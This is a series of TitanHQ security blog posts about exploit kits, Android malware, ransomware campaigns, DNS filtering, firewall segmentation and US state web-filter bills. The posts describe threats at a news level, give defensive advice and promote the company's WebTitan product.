The RIG exploit kit, used on compromised and malicious websites to silently download malware, has been upgraded with a new exploit. Windows Double Kill exploit code has been added to exploit the CVE-2018-8174 vulnerability – a remote code execution vulnerability that was addressed by Microsoft on May 2018 Patch Tuesday.
To protect against exploitation of this vulnerability, Windows users should ensure they have applied the latest round of patches, although many businesses have been slow to update their Windows devices, leaving them vulnerable to attack.
The vulnerability is in the VBScript engine and how it handles objects in the memory. If the vulnerability is exploited, attackers would gain the same level of privileges as the current user, could reallocate memory, gain read/write access, and potentially remotely execute code on a vulnerable device. The vulnerability has been named ‘Double Kill’ and affects all Windows versions.
The Windows Double Kill vulnerability was being actively exploited in the wild when Microsoft released the update on Patch Tuesday. Initially, exploitation of the vulnerability was achieved through phishing campaigns using RTF documents containing a malicious OLE object. If activated, an HTML page was downloaded and rendered through an Internet Explorer library and the VBScript flaw was exploited to download a malicious payload. The attack could also be conducted via a malicious website. In the case of the latter, it does not matter what browser the user has set as default – on unpatched systems the IE exploit could still work.
The Windows Double Kill exploit code was posted online this week and it didn’t take long for it to be incorporated into the RIG exploit kit. End users could be directed to the RIG exploit kit through phishing campaigns, malvertising, web redirects, or potentially could visit malicious sites through general web browsing. In addition to the Windows Double Kill exploit, the RIG exploit kit contains many other exploits for a wide range of vulnerabilities. Any individual that lands on a URL with the kit installed could be vulnerable even if the latest Windows patch has already been applied.
The threat from email-based attacks is also likely to grow. The Double Kill exploit code has also been incorporated into the ThreadKit exploit builder, which is used to create malicious Office documents for use in phishing attacks.
Protecting systems against these types of attacks requires prompt patching, although many organizations are slow to apply updates out of fear of compatibility problems, which could cause performance issues. Consequently, prior to applying patches they need to be fully tested and that can take time. During that time, organizations will be vulnerable to attack.
A web filter – such as WebTitan – provides an additional level of protection while patches are assessed for compatibility. WebTitan provides protection against exploit kits and malware downloads by preventing end users from visiting known malicious sites, either through general web browsing, redirects, or via hyperlinks contacted in phishing emails.
Managed Service Providers (MSPs) now have the option of providing an additional layer of security to their clients to protect against web-based cyberattacks now that TitanHQ’s powerful 100% cloud-based web filtering solution, WebTitan, has been incorporated into the Kaseya IT Complete suite.
The Kaseya technology alliance partner (TAP) program is highly regarded and brings together some of the world’s leading providers of IT solutions for MSPs, including Bitdefender, Cisco, and Dell.
The Kaseya IT Complete platform provides MSPs with easy access to a wide range of managed service-ready software, including cybersecurity, cloud management, endpoint management, network management, identity & access management, and disaster & recovery services. The platform makes it easy for MSPs to expand the services they provide to their clients and deliver invaluable solutions quickly and efficiently.
The platform has been developed to help MSPs increase revenue by providing profitable new services, automate the delivery of those services, and add more value by exceeding SLAs. The ease at which the solutions can be delivered saves MSPs valuable time, allowing them to free up staff to work on strategic projects.
MSPs have access to a wide range of cybersecurity solutions through the platform, but one notable gap was an easy to deploy web filtering solution. The addition of WebTitan to the Kaseya platform allows MSPs to add another layer of security to better protect their clients from web-based threats and malware and ransomware downloads. Being DNS-based, the solution can be quickly deployed with no need for any software downloads, hardware purchases, or site visits and can be deployed and configured in a matter of minutes.
The integration of WebTitan into the Kaseya IT Complete platform was completed in time for the Kaseya Connect conference, which is taking place this week in Las Vegas, Nevada. The event will be attended by some of the top MSPs from around the world.
“Kaseya is a partner we have admired for a long time and I’m delighted to announce this integration,” said Ronan Kavanagh, CEO of TitanHQ. “With over 10 million endpoints under their management it represents a massive opportunity for our business. We look forward to working with Kaseya’s MSP partners and adding our personal touch and renowned focus on great customer support.”
Adding WebTitan to our open ecosystem of partner solutions means our customers now have even greater access to best of breed technologies to meet the needs of their business. With growing concerns over malware, ransomware and phishing as key threats to MSP customers, WebTitan adds a highly effective layer of protection,” said Frank Tisellano, Jr., vice president product management and design.
Venture online and you will be faced with a wide range of threats, some of which could result in your bank account being emptied, others could result in sensitive information being exposed and your accounts being hijacked. Then there is ransomware, which could be used to stop you from accessing your data (unless you have backups or pay the ransom payment).
More malicious websites are now being created than legitimate sites, so how can you stay safe online? One solution used by businesses and ISPs is the use of a web filter. A web filter can be configured to restrict access to certain categories of Internet content and block the majority of malicious websites.
While it is possible for businesses or ISPs to purchase appliances that sit between end users and the Internet, DNS filters allow the Internet to be filtered without having to purchase any hardware or install any software. So how does DNS filtering work?
How Does DNS Filtering Work?
DNS filtering – or Domain Name System filtering to give it its full title – is a technique of blocking access to certain websites, webpages, or IP addresses. DNS is what allows easy to remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult to remember IP addresses – such as 18.104.22.168. DNS maps IP addresses to domain names.
When a domain is purchased from a domain register and that domain is hosted, it is assigned a unique IP address that allows the site to be located. When you attempt to access a website, a DNS query will be performed. Your DNS server will look up the IP address of the domain/webpage, which will allow a connection to be made between the browser and the server where the website is hosted. The webpage will then be loaded.
So how does DNS filtering work? With DNS filtering in place, rather than the DNS server returning the IP address if the website exists, the request will be subjected to certain controls. If a particular webpage or IP address is known to be malicious, the request to access the site will be blocked. Instead of connecting to a website, the user will be directed to a local IP address that will display a block page explaining that the site cannot be accessed.
This control could be applied at the router level, via your ISP, or a third party – a web filtering service provider. In the case of the latter, the user – a business for instance – would point their DNS to the service provider. That service provider maintains a blacklist of malicious webpages/IP addresses. If a site is known to be malicious, access to malicious sites will be blocked.
Since the service provider will also categorize webpages, the DNS filter can also be used to block access to certain categories of webpages – pornography, child pornography, file sharing websites, gambling, and gaming sites for instance. Provided a business creates an acceptable usage policy (AUP)and sets that policy with the service provider, the AUP will be enforced. Since DNS filtering is low-latency, there will be next to no delay in accessing safe websites that do not breach an organization’s acceptable Internet usage policies.
Will a DNS Filter Block All Malicious Websites?
Unfortunately, no DNS filtering solution will block all malicious websites, as in order to do so, a webpage must first be determined to be malicious. If a cybercriminal sets up a brand-new phishing webpage, there will be a delay between the page being created and it being checked and added to a blocklist. However, a DNS web filter will block the majority of malicious websites.
Can DNS Filtering be Bypassed?
The short answer is yes. Proxy servers and anonymizer sites could be used to mask traffic and bypass the DNS filter unless the chosen solution also blocks access to these anonymizer sites. An end user could also manually change their DNS settings locally unless they have been locked down. Determined individuals may be able to find a way to bypass DNS filtering, but for most end users, a DNS filter will block any attempt to access forbidden or harmful website content.
No single cybersecurity solution will allow you to block 100% of malicious websites or all NSFW websites, but DNS filtering should certainly be part of your cybersecurity defences as it will allow the majority of malicious sites and malware to be blocked.
If you have yet to implement a web filtering solution, are unhappy with your current provider, or you have questions about web filtering in the workplace, contact the TitanHQ team today and ask about WebTitan Cloud.
There have been significant developments relating to exploit kits in the past few days. The threat actors behind the Magnitude exploit kit have now changed their malicious payload, and the EITest malware distribution network that directed traffic to exploit kits has finally been sinkholed.
Magnitude Exploit Kit Switches to GandCrab Ransomware Delivery
Exploit kit activity is at a fraction of the level of 2015 and 2016, and in 2017 there was a 62% reduction in the development of exploit kits according to research from Recorded Future.
However, exploit kit activity has not fallen to zero and the malicious code is still widely used to deliver malware and ransomware underscoring the continued need for technologies to block these attacks such as web filtering solutions and the continued need to keep on top of patching.
Exploit kits often leverage vulnerabilities in Java and Adobe Flash, although more recently it has been Microsoft vulnerabilities that have been exploited due to the fall in Java vulnerabilities and the phasing out of Adobe Flash.
One exploit kit that is still being used in extensive attacks, albeit attacks that are highly geographically targeted, is the Magnitude exploit kit.
For the past seven months, the Magnitude exploit kit has been delivering the Magniber ransomware payload almost exclusively in South Korea. However, there has been a notable change in the past few days with it also being used to distribute GandCrab ransomware, with the latter not restricted geographically and capable of infecting English language Windows devices.
While early variants of GandCrab ransomware were cracked and free recovery of files was possible, there is no known decryptor for the current version of GandCrab ransomware being distributed via Magnitude. While Adobe Flash and Microsoft exploits were commonly used, Magnitude is now using a fileless technique to load the ransomware. This technique makes it much harder to detect.
According to Malwarebytes, “The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.” Once run, the payload is injected into explorer.exe, files are encrypted, and the infected device is rebooted.
EITest Malware Distribution Network Disrupted
There has been some major good news on the exploit kit front this week with the announcement that the EITest malware distribution network has finally been sinkholed. EITest has been active since at least 2011 and has been used to distribute all manner of malware over the years.
EITest was a major distribution network responsible for countless Kronos, Ramnit, DarkCloud and Gootkit infections, although more recently was used to deliver ransomware variants such as CryptXXX and Cerber and send users to sites running social engineering and tech support scams.
Prior to being sinkholed, EITest was redirecting as many as 2 million users a day to a network of more than 52,000 compromised websites that had been loaded with exploit kit code and social engineering scams. Most of the compromised sites were WordPress sites based in the USA, China, and Ukraine.
The threat actors behind EITest were selling traffic to other actors in blocks of between 50,000 and 70,000 visitors at a cost of $20 per thousand.
Over a 20-day period since EITest was sinkholed, more than 44 million users were directed to the sinkhole rather than malicious websites.
Now all redirects to malicious websites have stopped. The compromised websites remain active, but rather than redirecting users to malicious domains they are directing traffic to benign domains controlled by abuse.ch and brilliantit.com.
Regardless of the size of your business, the most effective security measure to deploy to block threat actors from gaining access to your servers, workstations, and data is a hardware firewall. A hardware firewall will ensure your digital assets are well protected, but how should your firewall be configured for optimal network security? If you follow network segmentation best practices and set up firewall security zones you can improve security and keep your internal network isolated and protected from web-based attacks.
Network Segmentation Best Practices
Most businesses have a well-defined network structure that includes a secure internal network zone and an external untrusted network zone, often with intermediate security zones. Security zones are groups of servers and systems that have similar security requirements and consists of a Layer3 network subnet to which several hosts connect.
The firewall offers protection by controlling traffic to and from those hosts and security zones, whether at the IP, port, or application level.
There is no single configuration that will be suitable for all businesses and all networks, since each business will have its own requirements and necessary functionalities. However, there are some network segmentation best practices that should be adopted.
Suggested Firewall Security Zone Segmentation
In the above illustration we have used firewall security zone segmentation to keep servers separated. In our example we have used a single firewall and two DMZ (demilitarized) zones and an internal zone. A DMZ zone is an isolated Layer3 subnet.
The servers in these DMZ zones may need to be Internet facing in order to function. For example, web servers and email servers need to be Internet facing. Because they face the internet, these servers are the most vulnerable to attack so should be separated from servers that do not need direct Internet access. By keeping these servers in separate zones, you can minimize the damage if one of your Internet facing servers is compromised.
In the diagram above, the allowed direction of traffic is indicated with the red arrows. As you can see, bidirectional traffic is permitted between the internal zone and DMZ2 which includes the application/database servers, but only one-way traffic is permitted between the internal zone and DMZ1, which is used for the proxy, email, and web servers. The proxy, email, and web servers have been placed in a separate DMZ to the application and database servers for maximum protection.
Traffic from the Internet is allowed by the firewall to DMZ1. The firewall should only permit traffic via certain ports (80,443, 25 etc.). All other TCP/UDP ports should be closed. Traffic from the Internet to the servers in DMZ2 is not permitted, at least not directly.
A web server may need to access a database server, and while it may seem a good idea to have both of these virtual servers running on the same machine, from a security perspective this should be avoided. Ideally, both should be separated and placed in different DMZs. The same applies to front end web servers and web application servers which should similarly be placed in different DMZs. Traffic between DMZ1 and DMZ2 will no doubt be necessary, but it should only be permitted on certain ports. DMZ2 can connect to the internal zone for certain special cases such as backups or authentication via active directory.
The internal zone consists of workstations and internal servers, internal databases that do not need to be web facing, active directory servers, and internal applications. We suggest Internet access for users on the internal network to be directed through an HTTP proxy server located in DMZ 1.
Note that the internal zone is isolated from the Internet. Direct traffic from the internet to the internal zone should not be permitted.
The above configuration provides important protection to your internal networks. In the event that a server in DMZ1 is compromised, your internal network will remain protected since traffic between the internal zone and DMZ1 is only permitted in one direction.
By adhering to network segmentation best practices and using the above firewall security zone segmentation you can optimize network security. For added security, we also recommend using a cloud-based web filtering solution such as WebTitan which filters the Internet and prevents end users from accessing websites known to host malware or those that contravene acceptable usage policies.
Web-based malware attacks via exploit kits were commonplace in 2016, although in 2017 this mode of attack fell out of favor with cybercriminals, who concentrated on spam email to deliver their malicious payloads. Exploit kit activity is now at a fraction of the level of 2016, although 2017 did see an increase in activity using the Rig and Terror exploit kits.
Now, a recent discovery by Proofpoint could see exploit kit activity start to increase once again. A new traffic distribution system is being offered on darknet marketplaces that helps cybercriminals direct users to sites hosting exploit kits and conduct web-based malware attacks.
Traffic distribution systems – also known as TDS – buy and sell web traffic and are used to direct web users from one website to another. When a user clicks on a link that is part of a TDS system, they are directed to a website without their knowledge – a website that could host an exploit kit and trigger a malware download.
The new TDS – known as BlackTDS – requires threat actors to direct traffic to the service, which then filters that traffic and directs individuals to exploit kits based on their profile data. The service maximizes the probability of the exploit kit being able to download malware onto their device. The service can also be used to determine which malware will be downloaded, based on the profile of the user.
Threat actors that sign up to use the service can inexpensively select the exploit kits and malware they want installed with all aspects of the malware distribution service handled by the developers of BlackTDS. The developers also claim their cloud-based TDS includes fresh HTTPS domains that have not been blacklisted and that it is difficult for their cloudTDS to be detected by security researchers and sandboxes.
Using spam campaigns and malvertising, threat actors can direct traffic to BlackTDS with all aspects of drive-by downloads handled by the developers. Campaigns being run using BlackTDS have been directing users to the RIG-v, Sundown, and Blackhole exploit kits which are used to download a wide range of keyloggers, ransomware, and other malware variants.
The provision of this malicious service makes it cheap and easy for threat actors to take advantage of web-based malware distribution rather than relying on spam email to spread malicious software. It also makes it clear that exploit kits are still a threat and that web-based malware attacks are likely to become more of a problem over the coming months.
To find out more about how you can protect your business from exploit kits and web-based malware attacks, contact the TitanHQ team today and ask about WebTitan.
A new bill has been introduced that proposes mandatory use of WiFi filters in libraries in Idaho to prevent wireless networks from being used to view obscene content. Current legislation in the state only applies to wired networks.
In many other states, web filters in libraries are only required for libraries that wish to obtain discounts on their internet services under the e-Rate program. Many libraries choose not to apply for such discounts to enable them to continue to provide full access to all forms of Internet content, instead choosing to implement policies and procedures covering acceptable usage of their computers and WiFi networks.
Policies and procedures are not seen as sufficient in Idaho, which already has one of the strictest laws in the United States covering internet filtering in libraries. In 2011, legislation was introduced that made it mandatory for library web filters to be implemented on any computers that can be used by minors. The bill that was passed was scaled back, with the original bill calling for mandatory use of Internet filters on all library computers.
The new resolution was introduced by an Idaho House State Affairs committee this week along with a new bill – proposed by Rep. Lance Clow (R-Twin Falls) – that requires all libraries in the state to expand their Internet filtering controls to include their WiFi networks.
The concern is that simply connecting to library WiFi networks may allow users to gain access to obscene content. “Families are torn apart because of the proliferation of this material,” said Clow. Pornography is “creating a public health crisis.”
The resolution says the use of pornography has been “linked to a reduced desire in young men to marry, dissatisfaction in marriage, and infidelity.” The committee wholeheartedly backed the resolution and the new bill, even changing the language to make it clear that young women were also adversely affected by obscene images. A similar resolution was introduced in Utah, on which the Idaho resolution was based.
The use of WiFi filters in libraries is unlikely to cause too many problems, since many filtering solutions that have been implemented already have the capacity to filter both wired and wireless networks. Some libraries have already made the decision to implement Internet filtering controls on their WiFi networks, even though they are not currently required to do so under state laws.
The implementation of WiFi filters in libraries is a quick and easy process with a solution such as WebTitan Cloud for WiFi. WebTitan allows libraries to accurately filter Internet content to prevent obscene images from being accessed without overblocking content. The solution is easy to configure, has a low maintenance overhead, and is one of the cheapest web filtering solutions on the market.
Being DNS based, there is no need for any software installations or hardware purchases. The solution is highly scalable and there is no latency, which makes it a winning solution for libraries and their patrons. WebTitan Cloud can also be easily applied to wired networks.
For further information on WebTitan Cloud and WebTitan Cloud for WiFi, for a product demonstration, and information on a free trial of the solution, contact the TitanHQ team today.
Today has seen the announcement of a new partnership between TitanHQ – the leading provider of email and web filtering solutions for MSPs – and the international consulting, coaching, and peer group organization HTG. The announcement was made at the Q1 HTG Peer Groups meeting at the Pointe Hilton Squaw Peak Resort, Phoenix, Arizona.
The partnership sees TitanHQ’s web filtering solution – WebTitan; its cloud-based anti-spam service – SpamTitan; and its email archiving solution – ArcTitan made immediately available to the HTG community.
TitanHQ has developed innovative cybersecurity solutions specifically for managed service providers to help them provide even greater protection to their clients from the ever-increasing volume of email and Internet-based threats. The multiple award-winning solutions have now been adopted by more than 7,500 businesses and 1,500 MSPs, helping to protect them from malware, ransomware, viruses, phishing, botnets, and other cyber threats.
HTG is a leading peer group association that was recently acquired by the global technology giant ConnectWise. HTG helps businesses plan and execute strategies to drive forward growth and increase profits. Its consultants and facilitators share wisdom, provide accountability, and build meaningful relationships with businesses to help them succeed in today’s highly competitive marketplace.
The new partnership will see TitanHQ join HTG Peer Groups as a Gold vendor, making the firm’s MSP-friendly cybersecurity solutions immediately available to the HTG community.
“We’re delighted to welcome TitanHQ on board for 2018. As soon as the initial discussion started we knew they would make a great match for our community, as web security is a key area for our members in 2018,” said HTG Peer Groups founder, Arlin Sorensen.
HTG Peer Groups Founder Arlin Sorensen (Left); TitanHQ CEO Conor Madden (Right)
“WebTitan web filter was built by MSP’s for MSP’s and this exciting relationship with HTG Peer Groups is a continuation of that process. It allows us to listen to the opportunities and difficulties faced by MSP senior executives while also allowing us to share how we became a successful web security vendor. Our goal is to successfully engage with HTG members to build strong and long-lasting relationships,” said TitanHQ CEO, Conor Madden.
Web security is a hot topic within the managed service provider community. MSPs are being called upon to improve web security for their clients and protect against a barrage of phishing, malware, and ransomware attacks. They are also called upon to mitigate malware and ransomware attacks when they are experienced by their clients, which can be time-consuming and costly. By implementing WebTitan, TitanHQ’s award-winning web filtering solution, MSPs can substantially reduce support and engineering costs.
WebTitan serves as a barrier between end users and the Internet, blocking attempts by users to visit malicious websites where malware and ransomware is silently downloaded. WebTitan is also a powerful content filtering solution that can be used to enforce organizations’ acceptable Internet usage policies.
The web filtering solution and TitanHQ’s anti-spam solution SpamTitan have been developed specifically with MSPs in mind. The solutions can be applied and configured in under 30 minutes without the need for additional hardware purchases, software downloads, or site visits. The solutions have a low management overhead which means MSPs can protect their clients from email and web-based threats, reduce the hands-on time they need to spend on their clients and provide greater value while improving their bottom lines.
Delegate Dave A. LaRock (R) and State Sen. Richard Hayden Black (R) have proposed a new bill in the Virginia General Assembly that would require a web filter on internet-enabled devices sold or distributed in the state of Virginia.
House Bill No. 1592, also referred to as the The Human Trafficking Prevention Act, is intended to reduce the availability of pornography, which is believed will reduce the level of human trafficking in Virginia.
Mandatory Web Filter on Internet-Enabled Devices in Virginia
The bill calls for a web filter on all internet-enabled devices. The filtering mechanism would be required to block all obscene items, including obscene images, obscene performances, and obscene exhibitions, in addition to child pornography and unlawful images/videos of people that have been recorded and/or distributed without consent.
The bill does not amount to a ban on pornography in Virginia, as it would be possible for purchasers of Internet-enabled devices – which includes computers, laptops, tablets, and smartphones – to legally disable the content blocking mechanism.
To do so would require an individual to prove to the vendor or distributor of the device, by means of an official photographic ID, that they are over 18 years of age. The distributor of the device must receive a written receipt confirming a written warning has been provided advising of the dangers of unblocking the content filter.
Anyone purchasing a device must also pay a one-time digital access fee of $20 to have the web filter lifted, in addition to any fee charged by the distributor or seller of the device to remove the web filtering capability on the device.
The $20 fee would be paid into a Virginia Prevention of Human Trafficking Victim Fund, while the charges applied by the seller/distributor could be retained. The Virginia Prevention of Human Trafficking Victim Fund would be used solely for supporting victims of human trafficking and to pursue criminal prosecutions in human trafficking cases.
There will be stiff financial penalties and potentially jail time for any seller/distributor who fails to apply the web filter. Removal of the filter without paying the fee would similarly be considered an offense under the Virginia Consumer Protection Act.
There have been mixed reactions to the new bill. Proponents of the bill believe a web filter on internet-enabled devices is necessary to make it harder for state residents to access pornography and that it would also help to prevent minors from accidentally or deliberately accessing obscene website content. It is argued that making individuals pay for access to obscene content would help to eliminate temptation.
Critics of the bill have said the proposed legislation amounts to a ‘sin tax’, while many others feel that such a law would violates the human rights of Americans.
Virginia is not the first state in the US to consider such a bill. House Bill No. 1592 is a virtual carbon copy of legislation that has been proposed in several other states including Alabama, New Mexico, North Dakota and South Carolina.
According to Kaspersky Lab, one of the most dangerous threats to mobile users is Skygofree malware – A recently discovered Android malware threat that has been described as the most powerful Android malware variant ever seen.
Skygofree malware has only recently been detected, but it is the product of some serious development. Kaspersky Lab believes it has been in development for more than three years. The result is a particularly nasty threat that all users of Android devices should take care to avoid. Once it is installed on a device, it has access to a considerable amount of data. It also has some rather impressive capabilities, being capable of 48 different commands.
Among its arsenal is the ability to take control of the camera and snap pictures and take videos without the knowledge of the user. It has access to geolocation data so is capable of tracking your every move. Where you go, as well as where you have been.
Skygofree malware will steal call records and discover who you have spoken to and when and will read your text messages. The malware can also record conversations and background noise, both for telephone calls and when the user enters a specific location – based on geolocation data – that has been set by the attacker.
Whenever you are in range of a WiFi network that is controlled by the attacker, the device will automatically connect, even if WiFi is turned off. It also has access to all information in the phone’s memory, can check your calendar to tell what you have planned, and intercept WiFi traffic.
You also cannot privately communicate using WhatsApp with Skygofree malware installed. It abuses the Android Accessibility Service and can view your messages. Skype conversations are similarly not secure. As if that was not enough, the malware also serves as a keylogger, recording all data entered on the device.
With such an extensive range of functions, this powerful new malware variant is clearly not the work of an amateur. It is believed to be the product of an Italian intercept and surveillance company called Negg, that is known to work with law enforcement agencies.
Kaspersky Lab researcher Alexey Firsh said, “Given the artefacts we discovered in the malware code and our analysis of the infrastructure, we have a high level of confidence that the developer behind the Skygofree implants is an Italian IT company that offers surveillance solutions, rather like HackingTeam.”
Skygofree malware is spread via malicious websites that closely resemble those of mobile carriers. Several mobile carriers including Vodaphone have been spoofed.
Protecting against malware threats such as this is difficult. The best defense is to be extremely careful browsing the internet. However, with malicious adverts able to redirect users to malicious sites, careful browsing is no guarantee of safety.
How to Protect Your WiFi Network and Block Malicious Websites
WebTitan for WiFi offers protection from malware when users connect to your WiFi network. WebTitan for WiFi is a powerful web filtering solution that can be used to restrict access to a predefined list of websites or configured to prevent users from visiting categories of websites known to carry a high risk of containing malware. Blacklists are also used to ensure known phishing and malware-laced websites, including those used to spread Android malware, cannot be accessed via your WiFi network.
To find out more about WebTitan for WiFi, and web filtering solutions for your wired networks, contact the TitanHQ today.
Loapi malware is a new Android malware variant that is capable of causing permanent damage to Android smartphones.
The new malware variant was recently discovered by researchers at Kaspersky Lab. In contrast to many new malware variants that operate silently and remain on the device indefinitely, Loapi malware infections can be short-lived. Kaspersky performed a test on an Android phone and discovered that within two days the phone had been destroyed.
The aim of the malware is not sabotage. Destruction of the device is just collateral damage that results from the intense activity of the malware. Loapi malware performs a wide range of malicious functions simultaneously, including some processor-intensive activities that cause the device to overheat, causing irreparable damage.
In the test, over the two days, the constant activity caused the device to overheat and the battery to bulge; deforming the device and its cover.
The researchers said Loapi malware is likely no other malware variant they have seen, and the researchers have seen plenty. Loapi malware was called a ‘jack of all trades’ due to its extensive capabilities. The malware is used to mine the cryptocurrency Monero, a processor-intensive process. The malware uses processing power of infected devices to create new coins. While the mining process is less intensive than for Bitcoin, it still takes its toll.
Additionally, the malware allows infected devices to be used in DDoS attacks, making constant visits to websites to take down online services. The malware is used to spam advertisements, and bombards the user with banners and videos
The malware will silently subscribe to online services, and if they require text message confirmation, that is also handled by the malware. The malware gains access to SMS messages and can send text messages to any number, including premium services. Text messages are used to communicate with its C2 server. Messages are subsequently deleted by the malware to prevent detection by the user, along with any text message confirmations of subscriptions to online services. Kaspersky Lab researchers note that the malware attempted to access more than 28,000 URLs in the two days of the test.
Any apps that are installed on the device that could potentially affect the functioning of the malware are flagged with a false warning that the app contains malware, telling the user to uninstall them. The user will be bombarded with these messages until the app is uninstalled, while other security controls prevent the user from uninstalling the malware or deactivating its admin privileges.
There is little the malware cannot do. The researchers point out that the only function that Loapi does not perform is spying on the user, but since the modular malware can be easily updated, that function could even be added.
While conclusive proof has not been obtained, Kaspersky Lab strongly suspects the malware is the work of the same cybercriminal operation that was behind Podec malware.
So how is Loapi malware distributed? Kaspersky notes that as is common with other Android malware variants, it is being distributed by fake apps on third-party app stores, most commonly disguised as anti-virus apps. A fake app for a popular porn website has also been used. Additionally, fake adverts have been detected that promote these fake apps, with more than 20 separate locations discovered to be pushing the malware.
The malware has not yet been added to the Google Play store, so infections can be prevented by always using official app stores.
A new Kentucky web filtering law have been proposed that will make it mandatory for all vendors of Internet-enabled devices in the state of Kentucky to have pornography filters installed that will prevent users from accessing adult content.
Similar laws have been proposed in other U.S. states to deal with the growing social problems that are caused by pornography. The proposed Kentucky web filtering law is virtually a carbon copy of bills that are being considered in Alabama, North Dakota, and South Carolina.
The proposed Kentucky web filtering law was introduced by Rep. Dan Johnson (R-Mt. Washington). The aim is not to make it impossible to access pornography in Kentucky, only to make it harder. If Kentuckians want to use their Internet-enabled devices to access obscene material such as pornography, they will be required to pay a fee of $20 to have the web filtering controls removed.
The fee could be paid on purchase of the device or at a later date. Lifting the web filter would require proof of age to be supplied and a consent form to be signed. This opt-in approach to adult content is seen as the best way to prevent many of the problems that arise from use of pornography, and to make it much more difficult for minors to view adult web content.
As with other similar web filtering laws that have been proposed, the fees would be directed, in part, to crime victim compensation funds as well as for law enforcement and to add to state funds.
If the Kentucky web filtering law is passed, it would make the supply of PCs and mobile phones without filtering software a Class A misdemeanour. Selling an Internet-enabled device to a minor without web filtering software to block pornography would be a class C felony,
In Alabama, the proposed laws would see the Class A misdemeanour attract a fine of up to $6,000 and a jail term of up to a year, while the Class C felony would be punishable with a $30,000 fine and up to 10 years in jail.
Laws proposed in Alabama, South Carolina and North Dakota also require a mechanism to be introduced that would allow webpages and websites that have not been blocked by the filter to be easily reported. A call center or website would need to be set up for this purpose, and the sites would need to be added to the filter within a reasonable time frame. The failure to do so would result in a fine of $500 per instance.
The new bill would need to survive a vote, but before that takes place, Rep. Johnson first needs to keep his position. Yesterday, Republicans and Democrats called for Johnson’s resignation following allegations that he sexually assaulted a 17-year old girl at his Fern Creek church.
Kaspersky Lab has named ransomware as one of the key threats of 2017, and one that continues to plague businesses the world over. Ransomware attacks in 2017 are down year on year, but ransomware attacks on businesses are up.
Ransomware attacks in 2016 were bad, but this year there have been three major attacks that have gone global – WannaCry in May, NotPetya in June, and most recently, the Bad Rabbit attacks in October. Many of the ransomware attacks in 2017 have been far more sophisticated than in 2015 and 2016, while attackers are now using a wider variety of tactics to install the malicious code.
At the start of 2016, ransomware was primarily being installed using exploit kits, before attackers switched to spam email as the main method of delivery. Spam email remains one of the most common ways for ransomware to be installed, although each of the above three attacks used exploits for unpatched vulnerabilities.
Those exploits had been leaked online by the hacking group Shadow Brokers, all of which had been developed and used by the NSA. While not severe as WannaCry, NotPetya and BadRabbit, exploits were also used by AES-NI and Uiwix ransomware variants. Threat actors are also using remote desktop protocol to gain access to systems to install ransomware, while the use of exploit kits is once again on the rise.
There has been a noticeable change in targets since 2015 when ransomware started to be favored by cybercriminals. Consumers were the main targets, although cybercriminals soon realized there was more to be made from attacking businesses. In 2016, 22.6% of ransomware attacks were on business users. The Kaspersky Lab report shows that ransomware attacks on businesses are becoming far more common, accounting for 26.2% of all attacks in 2017.
Out of the businesses that experienced a ransomware attack in 2017, 65% said they lost access to a significant amount of data, and in some cases, all of their data. Some businesses have prepared for the worst and have developed ransomware response plans and now have multiple copies of backups, with at least one copy on an unnetworked device. In the event of an attack, data can be recovered.
Others have not been so fortunate and have been left with no alternative other than to pay the ransom demand. As we saw with NotPetya, and many other ransomware and pseudo-ransomware variants, it is not always possible to recover data. The Kaspersky Lab report shows that one in six businesses that paid the ransom demand were unable to recover their data, creating massive business disruption and also potentially privacy and compliance fines. Keys to unlock the encryption were not provided or simply did not work.
There is some good news in the report. Ransomware attacks in 2017 affected 950,000 unique users, which is a considerable reduction from last year when 1.5 million users suffered a ransomware attack. This has been attributed not to a reduction in attacks, but better detection.
Kaspersky reports that the explosion in ransomware families in 2016 did not continue at the same level in 2017. Last year, 62 new families of ransomware were discovered. While there is still a month left of the year, to date, the number of new ransomware families in 2017 has fallen to 38.
While this appears to be good news, it is not an indication that the threat from ransomware is reducing. Kaspersky Lab notes that while the creation of new ransomware families halved in 2017, in 2016 there were 54,000 modifications made to existing ransomware variants, but this year there have been 96,000 modifications detected – Almost double the number of modifications last year. Rather than develop new ransomware families, cybercriminals are tweaking existing ransomware variants.
Kaspersky Lab, McAfee, and a host of security experts predict ransomware attacks will continue to plague businesses in 2018. As long as the attacks remain profitable they will continue, although Kaspersky Lab notes that 2018 is likely to see efforts switch to cryptocurrency miners, which can prove more profitable than ransomware in the long run. Even so, ransomware attacks are likely to continue for the foreseeable future.
To prevent the attacks, businesses need to implement a host of defenses to block and detect ransomware. Anti spam software can be deployed to prevent email-based attacks, web filters can be used to block access to websites hosting exploit kits and prevent drive -by downloads, and endpoint protection systems and network monitoring can detect changes made by ransomware and alert businesses to ransomware attacks in progress. Along with good backup policies and end user training, the threat from ransomware can be reduced to an acceptable level and the majority of attacks can be blocked.
A malware threat called LockCrypt ransomware is being used in widespread attacks on businesses in the United States, United Kingdom, and South Africa. While ransomware is commonly spread via spam email, this campaign spreads the file-encrypting malware via remote desktop protocol brute force attacks.
The LockCrypt ransomware attacks were first detected in June this year, but over the past few months the number of attacks has increased significantly, with October seeing the highest number of attacks so far this year.
LockCrypt ransomware is a relatively new malware variant, having first been seen in June 2017. Once infected, users will be unable to access their files. This ransomware variant uses RSA-2048 and AES-256 cryptopgraphy, which makes it virtually impossible to recover files without paying the ransom demand if a viable backup does not exist. To make recovery more difficult, LockCrypt ransomware also deletes Windows Shadow Volume copies. Encrypted files are given the .lock extension.
The ransom payment for this campaign is considerable – typically between 0.5 and 1 Bitcoin per encrypted server. That’s between $3,963 and $7,925 per compromised server; however, since the same login credentials are often used for RDP access on multiple servers, once one password is correctly guessed, it can be used to access multiple servers and deploy LockCrypt ransomware. One of the Bitcoin addresses used by the attackers shows one company paid a ransom of $19,000 to recover files on three of its servers.
Once access to a server is gained, ransomware is deployed; however, the attackers are manually interacting with compromised servers. AlientVault security researcher, Chris Doman, reported that for one company, in addition to deploying ransomware, the attackers “manually killed business critical processes for maximum damage.” All non-core processes on an infected server are killed.
The attacks do not appear to be targeted, instead they are randomly conducted on business servers. Businesses that are most likely to have ransomware installed are those that have failed to use complex passwords for RDP access. While it may be tempting to set an easy-to-remember password, this plays into the hands of attackers.
Other security controls such as two-factor authentication can reduce the risk from this type of attack, as can rate limiting to prevent the number of failed attempts a user can make before their IP address is temporarily – or permanently – blocked.
An additional control that system administrators can apply is to white-list certain IP addresses to restrict RDP access to authorized individuals. If that is not practical, disallowing RDP connections over the Internet from abroad can help to prevent these attacks.
